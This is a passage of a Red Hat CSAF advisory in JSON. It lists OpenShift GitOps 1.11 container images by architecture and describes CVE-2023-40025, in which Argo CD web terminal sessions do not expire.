"product_id": "openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"product": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"product_id": "openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"product": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"product_id": "openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/console-plugin-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"product": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"product_id": "openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"product": {
"name": "openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"product_id": "openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/dex-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"product": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"product_id": "openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/kam-delivery-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le",
"product": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le",
"product_id": "openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/must-gather-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"product": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"product_id": "openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator\u0026tag=v1.11.7-2"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le"
},
"product_reference": "openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x"
},
"product_reference": "openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64"
},
"product_reference": "openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64"
},
"product_reference": "openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le"
},
"product_reference": "openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64"
},
"product_reference": "openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x"
},
"product_reference": "openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64"
},
"product_reference": "openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64"
},
"product_reference": "openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le"
},
"product_reference": "openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64"
},
"product_reference": "openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x"
},
"product_reference": "openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64"
},
"product_reference": "openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le"
},
"product_reference": "openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64"
},
"product_reference": "openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x"
},
"product_reference": "openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64"
},
"product_reference": "openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x"
},
"product_reference": "openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64"
},
"product_reference": "openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64"
},
"product_reference": "openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le"
},
"product_reference": "openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x"
},
"product_reference": "openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64"
},
"product_reference": "openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le"
},
"product_reference": "openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64"
},
"product_reference": "openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le"
},
"product_reference": "openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64"
},
"product_reference": "openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64"
},
"product_reference": "openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x"
},
"product_reference": "openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x"
},
"product_reference": "openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64"
},
"product_reference": "openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64"
},
"product_reference": "openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
},
"product_reference": "openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-40025",
"cwe": {
"id": "CWE-613",
"name": "Insufficient Session Expiration"
},
"discovery_date": "2024-07-30T04:26:12+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2301445"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Argo CD. Affected versions of Argo CD have a bug where open web terminal sessions do not expire. This bug allows users to send WebSocket messages even if the token has expired. The most straightforward scenario occurs when a user opens the terminal view and leaves it open for an extended period. This flaw allows users to view sensitive information even after logging out.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "argo-cd: Argo CD web terminal session doesn\u0027t expire",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
